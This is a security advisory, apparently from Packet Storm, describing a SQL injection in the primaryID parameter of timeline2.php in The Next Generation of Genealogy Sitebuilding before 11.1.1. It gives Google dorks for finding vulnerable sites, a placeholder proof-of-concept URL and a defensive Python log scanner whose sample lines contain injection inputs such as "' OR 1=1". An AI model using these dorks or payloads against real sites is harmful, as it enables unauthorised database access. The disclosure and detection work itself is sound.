Fi8sVrs

The Next Generation Of Genealogy Sitebuilding SQL Injection


The Next Generation of Genealogy Sitebuilding versions prior to 11.1.1 suffer from a remote SQL injection vulnerability.

 

========================================================================================== 
 The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability 
========================================================================================== 

:-------------------------------------------------------------------------------------------------------------------------: 
: # Exploit Title : The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability  
: # Date : 29th August 2017  
: # Author : X-Cisadane 
: # CMS Name :  The Next Generation of Genealogy Sitebuilding 
: # Version : < 11.1.1
: # CMS Developer : http://www.tngsitebuilding.com/
: # Category : Web Application 
: # Vulnerability : SQL Injection 
: # Tested On : SQLMap 1.1.8.16#dev (Windows 7 64-bit) 
: # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan 
:-------------------------------------------------------------------------------------------------------------------------: 

A SQL injection vulnerability has been discovered in The Next Generation of Genealogy Sitebuilding CMS.
The vulnerability allows remote attackers to execute their own SQL commands by using a vulnerable service value.
The vulnerability is located in the primaryID value of the timeline2.php file.
Remote attackers are able to execute their own SQL commands by using a GET method request with a manipulated primaryID value.
Remote attackers are able to read database information by executing their own SQL commands.
  
DORKS (How to find the target) : 
================================  
inurl:/timeline2.php?primaryID= 
Or "powered by The Next Generation of Genealogy Sitebuilding" 
Or use your own Google Dorks :) 

Proof of Concept  
================  

SQL Injection 
PoC :  
http://[Site]/[Path]/timeline2.php?primaryID=['SQLi]  

Screenshot (PoC) : 
https://s20.postimg.org/asdu29rwt/Screenshot_99.png 
https://s20.postimg.org/wsu6iwakt/Screenshot_100.png 

Example of Vuln Sites : 

Source: https://packetstormsecurity.com/files/143954/The-Next-Generation-Of-Genealogy-Sitebuilding-SQL-Injection.html
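
For defenders reviewing web-server logs on an affected install, the following added example (not part of the original advisory or of TNG's own code) flags requests to timeline2.php whose primaryID value falls outside an allowlist. The allowlist pattern, the combined access-log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate primaryID values are short alphanumeric record IDs.
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Client address, request target and status from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample entries (documentation IP ranges, made-up paths and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Aug/2017:10:01:02 +0000] '
    '"GET /genealogy/timeline2.php?primaryID=I42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [29/Aug/2017:10:01:09 +0000] '
    '"GET /genealogy/timeline2.php?primaryID=I42\' HTTP/1.1" 500 310',
    '198.51.100.9 - - [29/Aug/2017:10:01:11 +0000] '
    '"GET /genealogy/timeline2.php?primaryID=I42%27%20OR%201=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [29/Aug/2017:10:02:00 +0000] '
    '"GET /genealogy/index.php HTTP/1.1" 200 900',
]


def suspicious_requests(log_lines):
    """Return (client, status, decoded_value) for each timeline2.php request
    whose primaryID does not match the allowlist."""
    hits = []
    for line in log_lines:
        match = REQUEST.match(line)
        if not match:
            continue  # not a parsable request line
        client, target, status = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/timeline2.php"):
            continue
        # parse_qs percent-decodes, so an encoded quote (%27) is checked
        # in the same form the application would receive it.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("primaryID", []):
            if not SAFE_ID.fullmatch(value):
                hits.append((client, int(status), value))
    return hits


if __name__ == "__main__":
    for client, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} primaryID={value!r}")
```

The same allowlist check, applied to primaryID before it reaches any query, is a stopgap for sites that cannot yet upgrade to 11.1.1 or later.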
